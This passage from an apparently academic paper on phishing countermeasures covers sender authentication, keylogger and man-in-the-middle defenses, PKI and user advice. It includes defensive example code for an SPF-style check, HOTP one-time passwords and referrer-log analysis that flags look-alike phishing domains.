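What the receiving side evaluates, as an added example written for this page (not code from the original paper): an SPF-style check of the kind Sender ID is built on, in which the receiver looks up the sending domain's policy record and decides whether the connecting IP address may use that domain. DNS is replaced by the constructed in-memory tables DNS_TXT and DNS_A so the example runs offline; bank.example, mailer.example and the addresses are documentation examples, not real infrastructure.

```python
"""
SPF-style authorisation check (the mechanism Sender ID builds on): given the
domain claimed by the sender and the IP address the mail actually came from,
evaluate the domain's published policy. Example code for this page, not from
the original paper; DNS is replaced by constructed tables.
"""
import ipaddress

# Constructed stand-in for DNS TXT and A records.
DNS_TXT = {
    "bank.example": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailer.example -all",
    "_spf.mailer.example": "v=spf1 ip4:198.51.100.10 a:mx.mailer.example ~all",
    "nopolicy.example": None,
}
DNS_A = {"mx.mailer.example": "198.51.100.20"}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_LOOKUPS = 10  # limit on DNS-querying mechanisms, as in the SPF specification


def check_spf(domain, ip, _lookups=None):
    """Return 'pass', 'fail', 'softfail', 'neutral', 'none' or 'permerror'."""
    lookups = _lookups if _lookups is not None else [0]
    record = DNS_TXT.get(domain)
    if not record or not record.startswith("v=spf1"):
        return "none"           # domain publishes no policy: nothing to verify
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        matched = False
        if mech == "all":
            matched = True
        elif mech in ("ip4", "ip6"):
            # a different address family never matches, no exception is raised
            matched = addr in ipaddress.ip_network(arg, strict=False)
        elif mech == "a":
            lookups[0] += 1
            target = DNS_A.get(arg or domain)
            matched = target is not None and ipaddress.ip_address(target) == addr
        elif mech == "include":
            lookups[0] += 1
            # include: matches only if the referenced policy yields 'pass'
            matched = check_spf(arg, ip, lookups) == "pass"
        else:
            return "permerror"  # unknown mechanism: treat as a broken record
        if lookups[0] > MAX_LOOKUPS:
            return "permerror"
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"            # no mechanism matched and no explicit 'all'


def demo():
    """A phisher on 203.0.113.5 claiming bank.example is rejected; the bank's own
    mailers and its outsourced provider pass."""
    return {ip: check_spf("bank.example", ip)
            for ip in ("192.0.2.25", "198.51.100.10", "198.51.100.20", "203.0.113.5")}
```

The check authenticates the domain the policy belongs to, nothing more: a phisher who registers a look-alike domain and publishes a valid record for it will pass this test, which is why the result has to be combined with what the user is actually shown in the From line.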

4.3 Consumer reporting

Since no user is immune to being spoofed on the Internet, users themselves have been diligent in helping
to recognize and report suspected hoaxes, and this has been one of the more successful ways of
identifying spoofed sites. Companies that are potential targets should make it easy for customers to
report phishing and other Internet scams, for example by providing a link on their home page so that
everyone can easily report suspected fraud.

4.4 Anti-phishing Solution Deployment

Organizations and institutions must be proactive in protecting their customers, brand and reputation
from the threat of phishing. Among many other measures, preventing the registration of cousin or
look-alike domains, detecting and analyzing attacks, and the technical and physical shutdown of phishing
sites are some of the available solutions. Some countermeasures prevent phishing by authenticating and
filtering email; others filter web content through consumer products such as browser toolbars. In many
cases an Internet data center that collects, analyzes and responds to threats is essential to the
functioning of a solution. Many solutions rely on consumers reporting spoofed emails and phishing
websites, which are then targeted for shutdown.

4.5 Countermeasures for keyloggers

Since protecting against keyloggers is no different from protecting against other types of malicious
programs, most antivirus companies have long since added known keyloggers to their databases. Install
an antivirus product and keep it up to date. Keyloggers are often classified by antivirus products as
"potentially unwanted programs" rather than as malware, so users should ensure that their antivirus
will, with its default settings, detect this kind of software. If not, it should be configured
accordingly to ensure protection against the most common keyloggers.

However, protecting against unknown malware is more complicated and the challenge is greater. Since the
main goal of a keylogger is to obtain a user's confidential data (passwords, bank card numbers, etc.),
there are some logical ways to protect against unknown keyloggers:

- using one-time passwords or two-step authentication
- using a system with proactive protection designed to detect keylogging software
- using a virtual keyboard

Since a one-time password is valid for a single use, and only for a limited time, capturing it does
little for the attacker: by the time the logged password is read, it has usually already been consumed
or has expired.

There are several ways to obtain or generate one-time passwords. We name only three of them here:

1- a USB key, such as an eToken(1), for example the eToken NG-OTP
2- a 'calculator'-style token, such as RSA SecurID(2)
3- a mobile phone text messaging system: the user is registered with the source system and receives a
PIN code by SMS as a reply, which is then used together with another confidential code for
authentication.

(1) "An eToken is a hardware mechanism used for password authentication via using identity management
technique and provides hacking problem solution to the user [6]."
(2) "RSA is the premier provider of security solutions for business acceleration, helping the world's
leading organizations succeed by solving their most complex and sensitive security challenges. Its
technology coupled with professional services and dozens of strategic third-party partnerships help
organizations bring trust to millions of user identities, the activities that they perform and the data
that is generated [7]."
The procedure for using each of the above methods is similar: the user connects to the Internet, opens
the page where the confidential information is to be entered, and then presses the device to obtain or
generate a one-time password. The user then enters the requested data; usually the PIN code and the
password are asked for one after the other to reduce the risk of the user being lured by a fake page.
The data is then processed by the server, which decides whether the user should be given access to the
resource or not [3].
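How an event-based one-time password of the kind produced by the tokens listed above is generated and checked, as an added example written for this page: OATH HOTP (RFC 4226), an HMAC-SHA-1 over a moving counter truncated to six digits, with a server-side record that consumes each counter so a logged code cannot be replayed. This is not code from the original paper and not the firmware of any particular token; the shared secret is the RFC 4226 test vector, and the OtpServer class, the PIN and the look-ahead window are constructed for the illustration.

```python
"""
OATH HOTP (RFC 4226) generation and server-side verification with a
resynchronisation window. Example code for this page, not from the original
paper; secret is the RFC 4226 test vector, the server record is constructed.
"""
import hashlib
import hmac
import struct

# RFC 4226 Appendix D test secret (20 ASCII bytes). A real token carries a
# random per-device secret provisioned at manufacture.
TEST_SECRET = b"12345678901234567890"
LOOK_AHEAD = 5  # how far ahead the server searches for a token that drifted


def hotp(secret, counter, digits=6):
    """HOTP(K, C) = Truncate(HMAC-SHA-1(K, C)) mod 10^digits, zero-padded."""
    msg = struct.pack(">Q", counter)                  # 8-byte big-endian counter
    mac = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                           # dynamic truncation offset
    code = ((mac[offset] & 0x7F) << 24 | mac[offset + 1] << 16
            | mac[offset + 2] << 8 | mac[offset + 3])
    return f"{code % 10 ** digits:0{digits}d}"


class OtpServer:
    """Server-side record for one token: the shared secret, the user's PIN and
    the next counter value expected. Every accepted counter, and all counters
    before it, are burned, so a code captured by a keylogger is useless once the
    legitimate user has logged in with it."""

    def __init__(self, secret, pin):
        self.secret = secret
        self.pin = pin
        self.counter = 0

    def verify(self, pin, code):
        if not hmac.compare_digest(pin, self.pin):
            return False
        for c in range(self.counter, self.counter + LOOK_AHEAD):
            if hmac.compare_digest(hotp(self.secret, c), code):
                self.counter = c + 1     # consume this and every earlier counter
                return True
        return False


def demo():
    """One login, one replay of the same code, then a resynchronised login."""
    server = OtpServer(TEST_SECRET, pin="4711")
    token_counter = 0
    first = hotp(TEST_SECRET, token_counter)        # user presses the token: "755224"
    token_counter += 1
    ok = server.verify("4711", first)               # True
    replay = server.verify("4711", first)           # False: counter 0 already consumed
    # The user pressed the button twice without logging in; the server catches up
    # because counter 3 lies within the look-ahead window starting at 1.
    token_counter += 2
    later = hotp(TEST_SECRET, token_counter)
    token_counter += 1
    resync = server.verify("4711", later)           # True
    return first, ok, replay, resync, server.counter
```

The replay in demo() is exactly the keylogger case: the captured code is correct but its counter has already been consumed. What the scheme does not cover is a phishing page that relays the code to the real site in real time; that case is addressed under the man-in-the-middle defenses.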
Virtual keyboards are another means of protecting against the interception of confidential data. A
virtual keyboard is a program that displays the keys on the monitor, so that the user enters data by
clicking with the mouse rather than typing on the keyboard. To be effective against keyloggers, a
virtual keyboard has to be specially designed so that information entered or transmitted via the
on-screen keyboard cannot be intercepted (for example by capturing the screen around each mouse click);
otherwise input via an ordinary on-screen keyboard is easily captured by malicious software.

4.6 Defense Mechanisms against the MITM

Since 2006 many companies have been working on defenses against this threat. This kind of phishing is a
huge threat in economic terms, and various anti-phishing groups are constantly working on new ideas to
prevent man-in-the-middle attacks. The methods use different forms of authentication to prevent an
attack. The main techniques are: public key infrastructures, mutual authentication with secret keys or
passwords, latency examination, verification over a second (secure) channel, one-time passwords (see
the countermeasures for keyloggers) and carry-forward verification. Note that a one-time password by
itself only prevents replay: a real-time man-in-the-middle proxy can relay it to the real site within its
validity window, so it must be combined with a method that authenticates the channel. Some of these
countermeasures are discussed below.

4.6.1 Public Key Infrastructure (PKI)

PKI deals with the authentication of public keys.
In cryptography, a PKI is an arrangement that binds public keys to the respective user identities by
means of a certificate authority (CA) [33]. The user identity has to be unique within each CA domain.
The binding is established through the registration and issuance process which, depending on the level
of assurance required, may be carried out by software at the CA under human supervision, that is, on the
application layer. For each user, the identity, the public key, their binding, validity conditions and
other attributes are fixed in a public key certificate issued and digitally signed by the CA, so that
they cannot be altered without detection.

Figure: Public key infrastructure.
Terms like CA, RA and VA will not be explained in this section because they are beyond the scope of this paper.

Our Client Server Example:

In our example with Alice, Bob and the attacker Eve, Eve looks for a weakness in the connection between
the two parties and tries to insert herself into it. To prevent this, there have to be security
enforcements on both sides, and this is where PKI comes in: a message that carries a digital signature
which verifies against a certificate issued by a trusted CA (certification authority) can be trusted to
come from the named party, and Eve cannot produce such a signature without the corresponding private key.
We will not go into more depth on this subject.

4.7 Robust web browser-blacklist

Some phishing attacks are technically more sophisticated and exploit vulnerabilities in popular web
browsers, such as Microsoft's Internet Explorer and Mozilla's Firefox, to install malicious software
(malware) that collects sensitive information. For example, a keylogger (see the section on keyloggers)
might be installed that logs all keystrokes whenever the user visits a site that asks for confidential
information. Another possibility for the attacker is to change the proxy settings of the user's browser
so that all web traffic the user initiates passes through the attacker's server, a typical
man-in-the-middle attack (see the section on man-in-the-middle attacks).
To mitigate phishing attacks, as well as other security threats that are directly related to browser
security (worms, Trojans and spyware), browser manufacturers need to make sure that their software is
free of known bugs and that users are up to date with the latest security fixes [10].
Several companies today offer plug-ins for browsers that can, to some extent, help keep sensitive data
secure. They remember where confidential information was entered and, when the same information is
entered again, check whether the current web site is the one that was visited previously. If not, they
warn the user that it may be a phishing website and offer to block it.
5 Involving characteristics in phishing
attacks
After a presentation of the most common attacks and their countermeasures, we can now specify some
of the characteristics which mostly are involved in these kinds of attacks. We will categorize the
characteristics into two groups in this section. One is from the personal or consumer point of view and
the other from the business or enterprise perspective.

5.1 Personal terms
There are five major issues identified as important from a personal or consumer's point of view [9]:

1- Education: educating the user about prevention methods and about preparing to avoid phishing attacks.
2- Preparation: the process of thinking through and specifying which measures should be taken in case a
phishing attack occurs.
3- Avoidance: activities that stop the onset of an attack.
4- Intervention: activities that the victim (individual or business) performs in order to minimize the
damage caused by a phishing attack.
5- Treatment: activities that are carried out to recover after being affected by such an attack.

5.2 Business terms

As important as the consumer side is, the websites themselves bear an equally large responsibility in
making the web "phishing-free". Below we list some of the important measures that IT departments have to
take in order to appear to the consumer market as a legitimate and trustworthy actor and trader [34].

1. Deciding whether an email or a website is genuine can sometimes only be done in one way: by looking
at the URL or the layout of the site. If either of these does not look right, the consumer has every
right to be suspicious. The company should therefore use consistent branding, especially in emails sent
to customers: the 'From' domain name should be the same one the consumers see on the website. Otherwise
it will be hard for the consumer to differentiate between a fake and a real e-mail.

The company should also help its customers secure their systems by not requiring the use of JavaScript
and ActiveX, and the website should be compatible with most browsers.

2. As mentioned above, the 'From' address in mail communication with consumers is quite important,
because phishers publicize their websites the same way spam is sent. To make the mail look real and
maximize the effect of the attack, the phisher will forge the company's own 'From' address. Because the
forged address belongs to the company's domain, messages to non-existent recipients bounce back to the
company's mail server rather than to the phisher, so a sudden wave of such bounces is an early indicator
of a campaign in progress.
3. After they have gathered the desired information, phishers usually redirect the user back to the
original site that the user intended to visit in the first place. The purpose is to hide the phishing
site from the user and to improve its plausibility. An enterprise can monitor the referrers of requests
to its public websites by configuring the web servers to log this data; most servers already do so by
default. This approach can help in discovering new phishing sites.
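The referrer monitoring of point 3, run over log lines as an added example written for this page (not code from the original paper): requests for the post-login landing pages whose Referer is not one of the company's own hosts are counted per referring host, which surfaces a phishing page that sends its victims on to the real site after harvesting their credentials. The Apache combined-format sample lines, the hostnames somesite.com and somesite-secure-login.example, the paths and the addresses are all constructed.

```python
"""
Referrer-based detection of phishing sites that redirect victims back to the
genuine site. Parses Apache combined-format access log lines and groups
landing-page hits by external referring host. Example code for this page, not
from the original paper; hosts, paths and log lines are constructed.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

OWN_HOSTS = {"www.somesite.com", "somesite.com", "login.somesite.com"}
LANDING_PAGES = {"/account/home", "/login"}   # where a redirected victim arrives

# Apache "combined" format:
# host ident user [time] "method path protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# Constructed sample: two normal visits, three victims bounced back from a
# phishing page on a look-alike domain, and one harmless external link.
SAMPLE_LOG = """\
198.51.100.4 - - [21/Apr/2010:16:01:07 +0200] "GET /account/home HTTP/1.1" 200 5120 "https://www.somesite.com/login" "Mozilla/5.0"
198.51.100.5 - - [21/Apr/2010:16:02:11 +0200] "GET /account/home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.17 - - [21/Apr/2010:16:03:40 +0200] "GET /account/home HTTP/1.1" 200 5120 "http://somesite-secure-login.example/verify.php" "Mozilla/4.0"
203.0.113.18 - - [21/Apr/2010:16:04:02 +0200] "GET /account/home HTTP/1.1" 200 5120 "http://somesite-secure-login.example/verify.php" "Mozilla/4.0"
203.0.113.19 - - [21/Apr/2010:16:05:55 +0200] "GET /login HTTP/1.1" 200 2048 "http://somesite-secure-login.example/verify.php?step=2" "Mozilla/4.0"
198.51.100.6 - - [21/Apr/2010:16:06:30 +0200] "GET /images/logo.png HTTP/1.1" 200 900 "http://blog.partner.example/post" "Mozilla/5.0"
"""


def parse(line):
    """Return the fields of one combined-format line as a dict, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_referrers(log_text, own_hosts=OWN_HOSTS, landing=LANDING_PAGES):
    """Count, per external referring host, how many landing-page hits it sent.

    Only landing pages are considered: an external blog linking to a logo or a
    public page is normal; an external page delivering users straight into the
    authenticated area (or onto the login form) is what a redirecting phishing
    site produces."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec or rec["path"].split("?")[0] not in landing:
            continue
        referer = rec["referer"]
        ref_host = urlsplit(referer).hostname if referer != "-" else None
        if ref_host and ref_host.lower() not in own_hosts:
            hits[ref_host.lower()] += 1
    return hits
```

Treat the output as a lead, not proof: the Referer header is set by the client and is often absent (browsers drop it when moving from HTTPS to HTTP, and a phishing page can suppress it), so a host that shows up here deserves a look, while an empty result does not mean no phishing site is active.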

6. A piece of advice
A general list of advice for users to minimize the threat and to avoid being affected by phishers is
given below.

6.1 Avoidance: visit web sites by typing the URL into the address bar; use spyware detection tools to
discover spyware; identify phishing sites and work with other organizations to take them down; use
firewalls; apply the security patches issued for the operating system; install an antivirus product and
keep it up to date; do not send personal or confidential data via email; implement mitigating
strategies; authenticate mail via digital signatures; implement anti-spam strategies.

6.2 Intervention(s): in case of uncertainty, contact the company before submitting information; look for
URLs that begin with 'https://', where the 's' indicates that the connection is encrypted (note that this
protects the data in transit but does not prove that the site is genuine, since phishing sites can use
HTTPS too); look for the 'lock' icon in the web browser before sending credentials to a website; be
cautious before opening any mail received from the Internet; forward suspicious emails to the relevant
parties; do not reply to emails that claim an account will be shut down.

6.3 Treatment(s): implement a strategy to determine the extent of the damage caused by a phishing attack;
if you realise you have supplied information, contact the applicable company immediately to prevent
possible misuse.

7. Conclusion
As a final perspective on our topic, we summarize what we have discussed in the former sections.
Phishing is indeed a big problem. It is also a big topic, and due to the restrictions and limitations of
time and scope we have not been able to discuss all of its variants. Having said this, we have covered
the main methods of phishing and the ways of preventing them. Cyber criminals are much smarter today and
will be even more so in the future; they use different methods to target different groups of users. Some
of the most popular ways attackers use to lure Internet users are rock phishing, man-in-the-middle
phishing, keylogger phishing and the two types of injection phishing. We discussed, for example, how they
try to lure bank customers by sending them fake web pages. By using one-time passwords, for example,
among the countermeasures suggested in this paper, the damage from such an attack can be limited.

There are some practical steps, suggested at the end of the paper, which, if taken by Internet users,
can reduce the threat to a great extent.
8. References
[1] Mohammad Badra, Samer El-Sawda: Phishing Attacks and Solutions.
http://portal.acm.org/citation.cfm?id=1385340
[2] Aaron Emigh: Online Identity Theft: Phishing Technology, Chokepoints and Countermeasures. October 3, 2005.
www.antiphishing.org/Phishing-dhs-report.pdf [accessed: 24.04.2010]
[3] Keyloggers: How they work and how to detect them (Part 1).
http://www.securelist.com/en/analysis/204791931/Keyloggers_How_they_work_and_how_to_detect_them_Part_1
[4] www.kaspersky.com/
[5] Rock Phishing: The Threat and Recommended Countermeasures.
www.markmonitor.com/download/wp/wp-rock-phish.pdf [accessed: 25.04.2010]
[6] http://www.roseindia.net/whatis/etoken.shtml
[7] http://www.rsa.com/node.aspx?id=1003
[8] Gunter Ollmann: The Phishing Guide: Understanding & Preventing Phishing Attacks.
www.ngssoftware.com/papers/nisr-wp-phishing.pdf
[9] Alta van der Merwe, Marianne Loock, Marek Dabrowski: Characteristics and Responsibilities involved in a Phishing Attack.
http://portal.acm.org/citation.cfm?id=1071752.1071800
[10] Engin Kirda, Christopher Kruegel: Protecting Users Against Phishing Attacks.
www.cs.ucsb.edu/~chris/research/doc/cj06_phish.pdf
[11] Phishing Activity Trends Report.
http://www.antiphishing.org/reports/apwg_report_Q4_2009.pdf
[20] Schneier on Security, a blog covering security and security technology.
http://www.schneier.com/blog/archives/2008/07/maninthemiddle_1.html
[21] http://en.wikipedia.org/wiki/Man-in-the-middle_attack
[22] The Open Web Application Security Project (OWASP).
http://www.owasp.org/index.php/Man-in-the-middle_attack
[23] http://www.vandyke.com/images/solutions/mitm.gif
[24] The Open Web Application Security Project (OWASP).
http://www.owasp.org/index.php/Session_hijacking_attack
[25] http://www.elitehackers.info/forums/archive/index.php/t-2933.html
[26] Uninett, the Norwegian research network.
http://forskningsnett.uninett.no/wlan/wlanthreat.html#08
[27] https://www.info-point-security.com/open_downloads/alt/SessionHijacking.pdf
[28] http://www.elitehackers.info/forums/archive/index.php/t-2933.html
[29] The Open Web Application Security Project (OWASP).
http://www.owasp.org/images/c/cb/Session_Hijacking_3.JPG
[30] Aaron Emigh: Online Identity Theft: Phishing Technology, Chokepoints and Countermeasures.
www.antiphishing.org/Phishing-dhs-report.pdf
[31] Chitwan Kumar Gupta: How to Avoid the Internet Scam.
http://www.associatedcontent.com/article/105088/_how_to_avoid_the_Internet_scam.html
[32] http://phish.kaffenews.com/wp-content/uploads/2010/01/Phish_Discover.png
[33] http://en.wikipedia.org/wiki/Public_key_infrastructure
[34] isc.sans.org/presentations/phishthat.pdf
